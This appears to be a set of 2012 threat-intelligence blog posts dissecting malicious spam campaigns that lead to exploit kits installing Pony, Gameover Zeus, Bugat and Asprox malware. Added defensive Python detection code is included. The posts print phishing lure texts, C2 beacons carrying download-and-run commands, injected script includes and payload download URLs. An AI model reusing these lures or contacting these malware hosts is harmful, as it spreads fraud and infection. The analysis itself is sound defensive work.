Contact to the nearest post office

On 2012-04-26 we observed a round of USPS flavored spam. We analyzed a spam message with the subject line “Contact to the nearest post office “. The full message was as follows:

Notification, 

We couldn’t deliver your parcel at your address. 

Reason deny: Postal code contains an error. 
LOCATION OF YOUR PARCEL:Des Moines 
STATUS OF YOUR ITEM: sort order 
SERVICE: Expedited Shipping 
Parcel number:U171553881 NU 
FEATURES: Yes 

The label of your parcel is enclosed to the letter. 
You should print the label and show it in the nearest post office to 
get a parcel. 

Important information! 
If the parcel isn’t received within 30 working days our company will 
have the right to claim compensation from you for it’s keeping in the 
amount of $12.28 for each day of keeping of it. 

You can find the information about the procedure and conditions of 
parcels keeping in the nearest office. 

Thank you for attention. 
USPS Express Services. 

Attached to this spam was the following zip archive:

File: Label_Parcel_USPS.NR_213-7004.zip
Size: 24725
MD5: 21464652804DE3916D755C75286AD5C4

This zip archive contained the following malicious downloader:

File: Label_Parcel.exe
Size: 26112
MD5: B37B8B306E9D2C1EEED0FB71C32E1657

This downloader installed itself on the victim's filesystem at C:\Documents and Settings\Administrator\Local Settings\Application Data\urlmon.exe, a filename that mimics the legitimate Windows library urlmon.dll.

This downloader sent the following GET request to a control server at everkosmo2012.ru:

GET /ab/index.php?r=gate&id=d0ef7554&group=24.04.2012_a&debug=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: everkosmo2012.ru

The control server returned the following response:

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Thu, 26 Apr 2012 12:52:08 GMT
Content-Type: text/html
Content-Length: 44
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze8
Vary: Accept-Encoding

run=http://www.baracademie.ca/_notes/ddd.exe

The downloader parsed the run= command and then downloaded the following executable from http://www.baracademie.ca/_notes/ddd.exe:

File: ddd.exe
Size: 579586
MD5: C64A7822CBF2EBA42D911B4F9E7C5D78

This executable is the same type of Office document stealer previously discussed in our American Airlines Ticket Attachment post. This Office document stealer variant POSTs stolen documents to everkosmo2012.ru over port 8000.
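As an added example that is not part of the original post, the following Python parses the gate exchange above and flags the two things worth alerting on in it: the beacon's query parameters (r=gate plus a bot id and a build group) and the User-Agent, which claims a Windows NT 9.0 that does not exist and carries an MSIE token without the "compatible;" prefix a real Internet Explorer sends. The transcript is reconstructed from the request and reply shown above (the CRLF framing is assumed); the table of known NT versions and the findings format are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Beacon reconstructed from the request and reply shown above; the request line,
# User-Agent and Host are copied from the post, the CRLF framing is assumed.
BEACON_REQUEST = (
    "GET /ab/index.php?r=gate&id=d0ef7554&group=24.04.2012_a&debug=0 HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\r\n"
    "Host: everkosmo2012.ru\r\n"
    "\r\n"
)
BEACON_RESPONSE_BODY = "run=http://www.baracademie.ca/_notes/ddd.exe\n"

# NT kernel versions a real browser could have reported in April 2012
# (2000, XP, 2003, Vista, 7 and the Windows 8 preview).
KNOWN_NT_VERSIONS = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2"}


def parse_beacon(raw_request):
    """Split the request into method, path, query parameters and headers."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {"method": method, "path": parts.path, "params": params, "headers": headers}


def parse_command(body):
    """The reply is bare key=value lines; 'run' carries the URL to fetch and execute."""
    commands = {}
    for line in body.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            commands[key.strip()] = value.strip()
    return commands


def beacon_findings(beacon):
    """Alertable traits of the beacon: the gate call itself and the forged User-Agent."""
    findings = []
    params = beacon["params"]
    if (beacon["path"].endswith("/index.php") and params.get("r") == "gate"
            and {"id", "group"} <= params.keys()):
        findings.append("gate beacon: bot id %s, build group %s" % (params["id"], params["group"]))
    ua = beacon["headers"].get("user-agent", "")
    nt = re.search(r"Windows NT (\d+\.\d+)", ua)
    if nt and nt.group(1) not in KNOWN_NT_VERSIONS:
        findings.append("User-Agent claims nonexistent Windows NT %s" % nt.group(1))
    if "MSIE" in ua and "compatible;" not in ua:
        findings.append("MSIE token without the 'compatible;' prefix a real IE sends")
    return findings
```

The id and group parameters identify the bot and its build and will change between campaigns; the malformed User-Agent is the more durable network signature, and it costs nothing to check at a proxy.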

The initial downloader then sent a second GET request to the control server at everkosmo2012.ru. The control server responded, instructing the downloader to grab a secondary malware executable from http://www.baracademie.ca/_notes/mmm.exe. This executable was an Asprox spambot. It had the following properties:

File: mmm.exe
Size: 237056
MD5: 650912C5F2763F55196616B76D880CAD

This Asprox spambot retrieved its configuration file via the following POST request to a control server at illinoisnot.ru:

POST /wet.php HTTP/1.1
Host: illinoisnot.ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746

The configuration file included the spam template the bot was to use. The downloaded template was as follows:

Message-ID: <%%MSGID%%>
From: %%FROM%%
To: <%%RCPT%%>
Subject: %%SUBJ%%
Date: %%DATE%%
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="%%BND:1%%"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

The configuration file instructed the Asprox bot to spam additional USPS-themed messages.

We noted that the domain illinoisnot.ru resolved to 81.17.24.72. This IP previously hosted other suspect domains including:

  • luxas87612.ru
  • bristol1883314.ru
  • equator991534.ru
  • ocean8838354.ru
  • chukchi293494.ru
  • chart71445.ru
  • kiribati23547.ru
  • united55658.ru
  • surero14568.ru
  • virific2012b.ru

We know that at least the bristol1883314.ru domain hosted a Smoke Loader control server.

Careerbuilder spam….again

Back in March, we wrote about a Careerbuilder spam that was used to drop a Gameover Zeus payload. Today we are seeing a nearly identical spam message dropping not Gameover Zeus but Bugat.

The body of the spam messages is similar to the following:

Hello,

I am a customer service employee at CareerBuilder. I found a vacant position at Security Finance Corporation that you may be interested in based on information from your resume or a recent online submission you made on our site. You can review the position on the CareerBuilder site here:

Chief Business Development Officer

Best wishes in your job search !

Gretchen
Careerbuilder Customer Service Team
CareerBuilder ,5550-A Peachtree Parkway , Norcross, GA 30092

If you compare the text of this spam to the one we saw in March, you will see they are almost identical except for a few words, such as the 'company' with the open position and the 'Careerbuilder Customer Service' team member's name.

While the emails use several different hyperlink URLs to redirect victims to an exploit kit, each of these URLs appears to end in 'car.html'.

The car.html pages redirect to a Blackhole exploit kit at masterinsland[.]net/main.php?page=975982764ed58ec3. This domain is hosted at IP address 70.32.97.205. The kit drops the payload via masterisland[.]net/w.php?f=58e0f&e=0. The Bugat payload has the following properties:

MD5: 518648694d3cb7000db916d930adeaaf
Size: 62,464 bytes
File Description: G Data AntiVirus

This variant uses the following C&C servers:

zorberzorberzu[.]ru/mev/in/
internetsexcuritee4dummies[.]ru/mev/in/
prakticalcex[.]ru/mev/in/
nalezivmordu[.]in/mev/in/

So, the question here is: is there any connection between the actor installing the March Gameover Zeus payload and the actor installing the current Bugat payload? Or is this merely a shared or copied spam template? Personally, I'm betting there is far more overlap than a copied spam template. We'd love to hear other opinions on this as well.

ACH Transfer Rejected

We analyzed the following malicious URL, used in ACH-themed spam on April 25, 2012:

hxxp://ft000267.ferozo.com/HbusWmxz/index.html

ACH Transfer rejected

This malicious page included four external JavaScript files:

<script type="text/javascript" src="hxxp://crowclub.ca/nRDnUrDq/js.js"></script>
<script type="text/javascript" src="hxxp://zadar.hr/aAyhw3ey/js.js"></script>
<script type="text/javascript" src="hxxp://giupban24h.com/v3NcYEV4/js.js"></script>
<script type="text/javascript" src="hxxp://pacilg.org/RaQhf32L/js.js"></script>

These scripts eventually redirected the victim to a Blackhole exploit kit at hxxp://216.119.142.235/showthread.php?t=34c79594e8b8ac0f

The Blackhole kit first dropped a Pony downloader from the following location:

hxxp://216.119.142.235/q.php?f=2fcad&e=2
File: contacts.exe
MD5: 242e28a23fbea9dc1e1939eea326a0d2
Size: 110,176 bytes

The Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download two identical Gameover Zeus payloads from the following locations:

1. hxxp://power-tec.sk/D8aoPu86/XPVqAGE.exe
2. hxxp://valuemerge.com/aXS0mRNT/KXj.exe

Gameover was installed in %APPDATA%\Ucnye\azufyv.exe

MD5: 647c62cd30f6fb4ea00e8829359b0a82
Size: 274,016 bytes
Timestamp: 2010:11:03 14:49:13+01:00
Signature: This file is digitally signed by ‘tNzquyHloA4n3FFctsvudWw7x’
Certificate Validity: 04/24/2012 to 01/01/2040

This Gameover Zeus variant posts to a dropzone at 89.44.245.126:17711. Webinjects were downloaded from 64.60.155.138:21835. The Gameover variant had a botid of "mf222a25" and cid of "3005".

Fwd: Scan from a Hewlett-Packard ScanJet #468974

We analyzed the following malicious URLs, used in the HP ScanJet spam:

hxxp://eksitonas.lt/KzHz5BzZ/index.html
hxxp://casagustosa.gr/zo799HVs/index.html

These pages included three external JavaScript files:

hxxp://yasonrafilm.com/ZAsUDjH1/js.js
hxxp://lsdkft.hu/bC1BxCbJ/js.js
hxxp://www.aafaq.ca/sxuvf5jV/js.js

These scripts eventually redirected the victim to a Blackhole exploit kit at hxxp://208.117.43.8/showthread.php?t=34c79594e8b8ac0f

The Blackhole kit first dropped a Pony downloader from the following location:

hxxp://208.117.43.8/q.php?f=2fcad&e=2
File: about.exe
MD5: 9b196853650fcb8ac182be05b627f07c
Size: 110,688 bytes

The Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download four identical Gameover Zeus payloads from the following locations:

1. hxxp://power-tec.sk/D8aoPu86/XPVqAGE.exe
2. hxxp://synergieassurance.com/AnJVfWxx/aFa.exe
3. hxxp://20272.w72.wedos.net/w7y74z3H/Hzt.exe
4. hxxp://electrosa.com/8zvW2XE.exe

Gameover was installed in %APPDATA%\Ociw\ilji.exe

MD5: 80bd579d484ac4742b75952fb1a2d694
Size: 274,016 bytes
Timestamp: 2010:11:03 04:51:09+01:00
Signature: This file is digitally signed by ‘tNzquyHloA4n3FFctsvudWw7x’
Certificate Validity: 04/24/2012 to 01/01/2040

This Gameover Zeus variant posts to a dropzone at 86.35.218.231:17554. Webinjects were downloaded from 189.78.203.103:29161. The Gameover variant had a botid of "MF222a24" and cid of "3005".

IRS spams

We analyzed the following malicious URLs, which we believe were used in IRS-themed spam:

hxxp://9x18.com/1FrYnHUV/index.html
hxxp://9x18.com/6GkXis2t/index.html
hxxp://9x18.com/7zSj5u8N/index.html
hxxp://9x18.com/9sfGpVaP/index.html
hxxp://9x18.com/DcXTY95c/index.html
hxxp://9x18.com/EdVTFHRy/index.html
hxxp://9x18.com/H37jjL6S/index.html
hxxp://9x18.com/JLdSGm4e/index.html
hxxp://9x18.com/KirxGAkT/index.html
hxxp://9x18.com/M7vrQsUT/index.html
hxxp://9x18.com/N7kkDdho/index.html
hxxp://9x18.com/U8nC5QAL/index.html
hxxp://9x18.com/Y1aFsgBk/index.html
hxxp://9x18.com/bFdJryZB/index.html
hxxp://9x18.com/igc6smeH/index.html
hxxp://9x18.com/jUyLton1/index.html
hxxp://9x18.com/pHbH0hzY/index.html
hxxp://9x18.com/rPWsV1Cp/index.html
hxxp://9x18.com/tjUQVqbC/index.html
hxxp://beinsync.in/1FrYnHUV/index.html
hxxp://9x18.com/wVKshGdP/index.html
hxxp://beinsync.in/6GkXis2t/index.html
hxxp://alcopaz.com/1FrYnHUV/index.html
hxxp://beinsync.in/7zSj5u8N/index.html
hxxp://alcopaz.com/6GkXis2t/index.html
hxxp://beinsync.in/9sfGpVaP/index.html

Although 9x18.com was already refusing requests for these URLs, the other hosts were still up and redirecting victims to the Blackhole exploit kit through the following three JavaScript includes:

<script type="text/javascript" src="hxxp://anydemo.in/ox8rWBHG/js.js"></script>
<script type="text/javascript" src="hxxp://Darsshan.com/8n9SXXoy/js.js"></script>
<script type="text/javascript" src="hxxp://www.moverpackermart.com/3F634op7/js.js"></script>

The Blackhole kit was running at hxxp://85.25.189.174/showthread.php?t=34c79594e8b8ac0f. It first dropped a Pony downloader from the following location:

hxxp://85.25.189.174/q.php?f=2fcad&e=2
File: info.exe
MD5: 9b196853650fcb8ac182be05b627f07c
Size: 131,168 bytes

The Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download four identical Gameover Zeus payloads from the following locations:

1. hxxp://electrosa.com/8zvW2XE.exe
2. hxxp://arteyciencia.es/AUq5p7Sm/4VLks.exe
3. hxxp://hotelsatmatheran.com/0Pvo9Hnu/EpJbWNWD.exe
4. hxxp://poetesa.ro/0SbvQR5X/5op0.exe

Gameover was installed in %APPDATA%\Enze\izvuo.exe

MD5: 4105a615d658d89e836c125844be5f39
Size: 341,600 bytes
Timestamp: 2010:10:31 08:13:32+01:00
Payload Build Time: 2012-04-16 03:12:58

This Gameover Zeus variant posts to a dropzone at 86.124.117.250:16824. Webinjects were downloaded from 125.166.213.114:25137. The Gameover variant had a botid of "MF222a20" and cid of "5555".

As we have been noting here, the Pony downloader and Gameover Zeus payloads share the same signer and version information, which suggests both were built by the same group at around the same time:

Signature: Digitally signed by ‘wU5sF34khy4k0DMt30RspNOOm’
Certificate Validity: 04/20/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

ACH Transaction Rejected

The samples we analyzed linked to malicious pages at hxxp://cayambeturismo.gob.ec/zHyxgRft/index.html and hxxp://doctors.eyes.org/a6qYbbvX/index.html

ACH transaction rejected

This malicious page contained javascript that redirected victims to a Blackhole Exploit kit at

hxxp://85.25.189.174/showthread.php?t=34c79594e8b8ac0f

The Blackhole kit first dropped a Pony downloader from the following location:

hxxp://85.25.189.174/q.php?f=2fcad&e=2
File: about.exe
MD5: 9b196853650fcb8ac182be05b627f07c
Size: 131,168 bytes

The Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download three identical Gameover Zeus payloads from the following locations:

1. hxxp://electrosa.com/8zvW2XE.exe
2. hxxp://arteyciencia.es/AUq5p7Sm/4VLks.exe
3. hxxp://poetesa.ro/0SbvQR5X/5op0.exe

Gameover was installed in %APPDATA%\Yblaa\duoju.exe

MD5: a898d910ac17e2dc00333a410daeaa68
Size: 347,744 bytes
Timestamp: 2010:10:28 19:52:20+02:00

This Gameover Zeus variant posts to a dropzone at 190.200.120.150:17663. Webinjects were downloaded from 210.4.72.124:13525. The Gameover variant had a botid of "mf222a20" and cid of "5555".

Again, as noted over the past few days, the Pony downloader and Gameover Zeus payloads shared the same properties:

Signature: Digitally signed by ‘wU5sF34khy4k0DMt30RspNOOm’
Certificate Validity: 04/20/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

Scan from a Xerox WorkCentre Pro #315614

The sample we analyzed had a link to a malicious page at hxxp://shopdreambags.com/FD6YBhNw/index.html

Scan from Xerox 315614

This malicious page contained javascript that redirected victims to a Blackhole Exploit kit at

hxxp://184.22.115.24/showthread.php?t=34c79594e8b8ac0f

The Blackhole kit first dropped a Pony downloader from the following location:

hxxp://184.22.115.24/q.php?f=2fcad&e=2
File: contacts.exe
MD5: ce1e4177bb2605a8637e386c6f7ab737
Size: 129,632 bytes
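The redirect chain is the same in every Blackhole case on this page: a compromised site serving /<8 alphanumerics>/index.html, three or four injected script includes of the form /<8 alphanumerics>/js.js, a landing page at showthread.php?t=<16 hex> (the same t=34c79594e8b8ac0f on four different hosts) and a payload fetch from q.php?f=...&e=.... As an added example, not code from the original post, the Python below extracts the injected includes from a page and reconstructs the chain per client from proxy log lines. The HTML and the log lines are constructed for this example around the hostnames listed in the ACH post above; the stage names are this example's own. The t= check is what separates the kit from an ordinary vBulletin showthread.php URL.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed landing page: the two js.js hostnames are from the post, the
# surrounding markup and the benign jquery include are this example's own.
LANDING_HTML = """<html><head><title>ACH Transfer rejected</title>
<script type="text/javascript" src="http://crowclub.ca/nRDnUrDq/js.js"></script>
<script type="text/javascript" src="http://zadar.hr/aAyhw3ey/js.js"></script>
<script type="text/javascript" src="http://www.example.org/static/jquery.js"></script>
</head><body>Please wait...</body></html>"""

# Constructed proxy log (timestamp, client, URL): the kit URLs are the ones the
# post lists; the clients, timestamps and benign lines are made up.
PROXY_LOG = """2012-04-25T14:02:11 10.1.2.3 http://ft000267.ferozo.com/HbusWmxz/index.html
2012-04-25T14:02:12 10.1.2.3 http://crowclub.ca/nRDnUrDq/js.js
2012-04-25T14:02:14 10.1.2.3 http://216.119.142.235/showthread.php?t=34c79594e8b8ac0f
2012-04-25T14:02:19 10.1.2.3 http://216.119.142.235/q.php?f=2fcad&e=2
2012-04-25T14:03:01 10.1.2.9 http://forum.example.com/showthread.php?t=1234
2012-04-25T14:03:05 10.1.2.9 http://www.example.org/static/jquery.js"""

SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.I)
# Compromised-site stages: an eight-character directory holding index.html or js.js.
LANDING_PATH = re.compile(r"^/[A-Za-z0-9]{8}/index\.html$")
REDIRECTOR_PATH = re.compile(r"^/[A-Za-z0-9]{8}/js\.js$")
# Blackhole landing token: 16 hex characters, which is what rules out a real
# vBulletin showthread.php?t=<thread number> URL.
LANDING_TOKEN = re.compile(r"^[0-9a-f]{16}$")


def classify_url(url):
    """Return the chain stage a URL belongs to, or None if it looks benign."""
    parts = urlsplit(url)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if REDIRECTOR_PATH.match(parts.path):
        return "redirector"
    if LANDING_PATH.match(parts.path):
        return "compromised-landing"
    if parts.path.endswith("/showthread.php") and LANDING_TOKEN.match(query.get("t", "")):
        return "blackhole-landing"
    if (parts.path.endswith("/q.php") and re.fullmatch(r"[0-9a-f]+", query.get("f", ""))
            and query.get("e", "").isdigit()):
        return "blackhole-payload"
    return None


def extract_redirectors(html):
    """Script includes in a page that match the injected js.js redirector pattern."""
    return [src for src in SCRIPT_SRC.findall(html) if classify_url(src) == "redirector"]


def chains_from_log(log_text):
    """Per client, the chain stages seen in log order; benign requests are dropped."""
    chains = {}
    for line in log_text.splitlines():
        _ts, client, url = line.split(" ", 2)
        stage = classify_url(url)
        if stage:
            chains.setdefault(client, []).append(stage)
    return chains


def likely_exploited(chains):
    """A q.php fetch only happens after an exploit ran, so landing plus payload
    means the client most likely executed the Pony dropper."""
    return sorted(client for client, stages in chains.items()
                  if "blackhole-landing" in stages and "blackhole-payload" in stages)
```

Clients that reached the landing page but never fetched q.php are still worth a look (the exploit may have failed or been blocked), but the q.php hit is the one that should open an incident.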

The Pony downloader posts to its dropzone at 200.72.183.54//pony/gate.php. It was also configured to download three identical Gameover Zeus payloads from the following locations:

1. hxxp://poetesa.ro/0SbvQR5X/5op0.exe
2. hxxp://arteyciencia.es/AUq5p7Sm/4VLks.exe
3. hxxp://redman.com.br/zqDQMaNF/SRivXt.exe

Gameover was installed in %APPDATA%\Jysah\gaihyl.exe

MD5: a898d910ac17e2dc00333a410daeaa68
Size: 347,744 bytes
Timestamp: 2010:10:31 04:27:18+01:00

This Gameover Zeus variant posts to a dropzone at 187.105.228.200:11752. Webinjects were downloaded from 71.80.237.121:14268. The Gameover variant had a botid of "MF222a19" and cid of "5555".

Interestingly, the Pony downloader and Gameover Zeus payloads shared the same signer and version information, suggesting both were built by the same group at around the same time:

Signature: Digitally signed by ‘VfnHcYKXDLnVlQizT9uLI4yhP’
Certificate Validity: 04/18/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

VALERIO Pizza Order Confirmation

Order Confirmation

The sample we analyzed had a link to a malicious page at hxxp://printingcheaper.com/page1.htm?XVUU=S1KGEAGODJ8XNNAHB48IE5UHL&ZELSDVH=J0VL2BFPNUITV68G6&ID5TU3=UA0MLSUW5R2R8GC&DT9=MXK3SEKG0JMHDAU0RZAG6P3K&4S0W2E=8MG1P4S5IGNJAPNX87C&G4YO6P6=AEPEC1D5PXXZ&CS66A7F=RNK4RSELG796VIEX0TUYQ8F9&877R2=VGZBG625JCT8Z9O2K&KQA05=5L5TW1IP247&

This malicious page contained JavaScript that redirected victims to a Phoenix exploit kit at hxxp://uiwewsecondary.ru:8080/internet/fpkrerflfvd.php. The Phoenix kit first served a PDF exploiting CVE-2010-0188 (Adobe Reader) from hxxp://uiwewsecondary.ru:8080/internet/kqbzaubpiqxnbn.pdf. The PDF file had the following properties:

File: kqbzaubpiqxnbn.pdf
MD5: 1b6f367a28de927e6573e803e555a297
Size: 13,163 bytes

A successful exploit in turn handed victims off to a second exploit kit at hxxp://poluicenotgo.ru:8080/internet/at.php?i=15. This kit dropped a Pony downloader with the following properties:

File: esfwatkocliuyn.exe
MD5: 5726463108bb6f26e6dd54763e85453b
Size: 135,264 bytes

Both Phoenix exploit kits are hosted on the same fast-flux infrastructure, at the following IP addresses:

83.170.91.152
85.214.204.32
88.190.22.72
89.31.145.154
112.78.124.115
125.19.103.198
41.168.5.140
62.85.27.129
173.203.211.157
210.56.23.100
211.44.250.173
216.24.197.66
219.94.194.138

The Pony downloader posts to its dropzone at hxxp://dare2dreamz.com/pony/gate.php, hosted at IP address 109.206.180.54. It was also configured to download three identical Gameover Zeus payloads from the following locations:

1. hxxp://dynolite.eu/7U0ASvP9/AZz.exe
2. hxxp://abbott.u4ria.co.za/HGFg1RHz/MkiZMX.exe
3. hxxp://demircioglubilgisayar.com.tr/qy3kMMxv/VgWqQm4k.exe

Gameover was installed in %APPDATA%\Meizo\ehgea.exe

MD5: a3e56f7ba6cd98b2ac87596daf74e2aa
Size: 371,808 bytes
Timestamp: 2010:10:29 14:08:06+02:00

This Gameover Zeus variant posts to a dropzone at 211.73.186.159:28813. Webinjects were downloaded from 76.73.52.11:25362. The Gameover variant had a botid of “MF222a17” and cid of “5555”.

Interestingly, the Pony downloader and Gameover Zeus payloads shared the same signer and version information, suggesting both were built by the same group at around the same time:

Signature: Digitally signed by ‘VfnHcYKXDLnVlQizT9uLI4yhP’
Certificate Validity: 04/16/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

NY TRAFFIC TICKET

Malicious URL:
hxxp://partyinthepark.co.za/page4.htm?563H0J=7J7WVK3SIM15NMTA5&SGLU=GPRI34KVG4J9QB&VNOP=DY7VUBIXD4WT&5LEPGN=4IWARW2MUHFT&

NY Traffic Ticket

The “To Plead Click Here” text in the spam carried a malicious hyperlink that eventually redirects the victim to a Phoenix exploit kit at hxxp://vitalitysomer.ru:8080/pages/glavctkoasjtct.php.

This Phoenix kit is hosted on a fast-flux infrastructure at the following IP addresses:

83.170.91.152
85.214.204.32
88.190.22.72
89.31.145.154
112.78.124.115
125.19.103.198
41.168.5.140
62.85.27.129
219.94.194.138
210.56.23.100
211.44.250.173

The Phoenix controller serves a PDF exploiting CVE-2010-0188 from hxxp://vitalitysomer.ru:8080/pages/jnapaqjrezbpj8.pdf. The PDF file had the following properties:

File: jnapaqjrezbpj8.pdf
MD5: 73a3d52244f68a2eb4254be2f9e9d740
Size: 13,151 bytes

A successful exploit dropped a Pony downloader on the victim machine; the downloader itself was served by another Phoenix exploit kit at hxxp://validatoronmee.ru:8080/pages/dq.php?i=15, hosted on the same fast-flux infrastructure as vitalitysomer.ru. The Pony downloader had the following properties:

File: duczdzd.exe
MD5: 392a574415aa24efbb1f7eda3564060d
Size: 140,840 bytes
Timestamp: 2012:04:13 23:48:26+02:00

The Pony downloader beacons to its dropzone at buyandsmile.atomclick.co/pony/gate.php. It was also configured to download three identical Gameover Zeus payloads from the following locations:

1. avrupamodaevi.com/Rp076wCE/JVB0dU2.exe
2. guidobruscia.it/aPRh4MrM/j0Bxm4C.exe
3. 20rueraspail.be/pBBJkPFK/PwpKbEJm.exe

Gameover was installed in %APPDATA%\Wievo\myaxu.exe

MD5: 5210005536c9f3bbcda0149da4ff37c8
Size: 313,384 bytes
Timestamp: 2010:11:01 22:21:42+01:00

This Gameover Zeus variant posts to dropzones at 76.113.104.21:26928 and 178.235.0.255:16270. Webinjects were downloaded from 46.35.131.65:20177 and 116.203.3.213:28542. The Gameover variant had a BotID of “mf222a15” and CID of “2222”.

Again, the Pony downloader and Gameover Zeus payloads shared the same signer and version information, indicating both were built by the same group at around the same time:

Signature: This file is digitally signed by ‘gvpQYV0qr00yndP’
Certificate Validity: 04/13/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385
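The shared signer string, the validity period running to 2040 and the copied DFDWiz.exe version info are the pivots that tie each Pony sample on this page to its Gameover payload. As an added example, not part of the original post, the Python below applies those three checks to records built from the metadata blocks above and groups the samples by signer. The record layout, the randomness heuristic and its threshold are this example's own assumptions, and the control record is constructed; a real pipeline would populate the records from a PE parser and the Authenticode certificate chain.

```python
from datetime import date

# Constructed records assembled from the signer and version-info blocks on this
# page (signer CN, certificate validity, claimed company). The record layout is
# this example's own.
SAMPLES = [
    {"name": "Pony info.exe", "signer": "wU5sF34khy4k0DMt30RspNOOm",
     "company": "Microsoft Corporation",
     "valid_from": date(2012, 4, 20), "valid_to": date(2040, 1, 1)},
    {"name": "Gameover izvuo.exe", "signer": "wU5sF34khy4k0DMt30RspNOOm",
     "company": "Microsoft Corporation",
     "valid_from": date(2012, 4, 20), "valid_to": date(2040, 1, 1)},
    {"name": "Pony contacts.exe", "signer": "VfnHcYKXDLnVlQizT9uLI4yhP",
     "company": "Microsoft Corporation",
     "valid_from": date(2012, 4, 18), "valid_to": date(2040, 1, 1)},
    {"name": "Gameover gaihyl.exe", "signer": "VfnHcYKXDLnVlQizT9uLI4yhP",
     "company": "Microsoft Corporation",
     "valid_from": date(2012, 4, 18), "valid_to": date(2040, 1, 1)},
    # Constructed control shaped like a genuinely signed Microsoft binary.
    {"name": "control dfdwiz.exe", "signer": "Microsoft Corporation",
     "company": "Microsoft Corporation",
     "valid_from": date(2011, 10, 10), "valid_to": date(2012, 10, 10)},
]


def _char_class(c):
    if c.isupper():
        return "U"
    if c.islower():
        return "L"
    if c.isdigit():
        return "D"
    return "O"


def signer_looks_random(name):
    """Heuristic for a machine-generated CN: no word separators, contains digits,
    and the character class (upper/lower/digit) flips at least 35% of the time."""
    if " " in name or len(name) < 8 or not any(c.isdigit() for c in name):
        return False
    classes = [_char_class(c) for c in name]
    flips = sum(1 for a, b in zip(classes, classes[1:]) if a != b)
    return flips / (len(name) - 1) >= 0.35


def validity_years(valid_from, valid_to):
    return (valid_to - valid_from).days / 365.25


def triage(rec):
    """Reasons this record's signature does not match what it claims to be."""
    reasons = []
    if "microsoft" in rec["company"].lower() and "microsoft" not in rec["signer"].lower():
        reasons.append("version info claims %s but signer CN is %r" % (rec["company"], rec["signer"]))
    years = validity_years(rec["valid_from"], rec["valid_to"])
    if years > 10:
        reasons.append("certificate valid for %.0f years" % years)
    if signer_looks_random(rec["signer"]):
        reasons.append("signer CN looks machine-generated")
    return reasons


def link_by_signer(samples):
    """Group sample names by signer CN, keeping only signers seen more than once."""
    groups = {}
    for rec in samples:
        groups.setdefault(rec["signer"], []).append(rec["name"])
    return {signer: names for signer, names in groups.items() if len(names) > 1}
```

The 0.35 threshold is deliberately loose: on the four signer strings listed on this page the flip rate is between 0.4 and 0.7, while a CN made of real words such as "Microsoft Corporation" sits near 0.2. None of these checks verifies the signature itself; they are triage pivots for a sample whose signature has already failed or chains to an unknown root.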

Confirm your US airways online reservation

On 2011-04-09 we observed an interesting round of US Airways spam. The sample we analyzed had a subject line of “Confirm your US airways online reservation”.

While this same template had been previously used in high-profile Gameover Zeus laden spam campaigns, this particular campaign was a bit different. The sample we analyzed had a link to a malicious page at go2gamers.com/us.html. Other spam samples from the same campaign had links to hacked websites with malicious us.html pages.

The malicious us.html page contained JavaScript that redirected victims to a Blackhole Exploit Kit at bamboozlefitclub.net/main.php?page=745b81e2608709b2. The bamboozlefitclub.net domain resolved to 85.189.11.134.

This Blackhole kit dropped a Bugat* payload with the following properties:

File: about.exe
Size: 71680
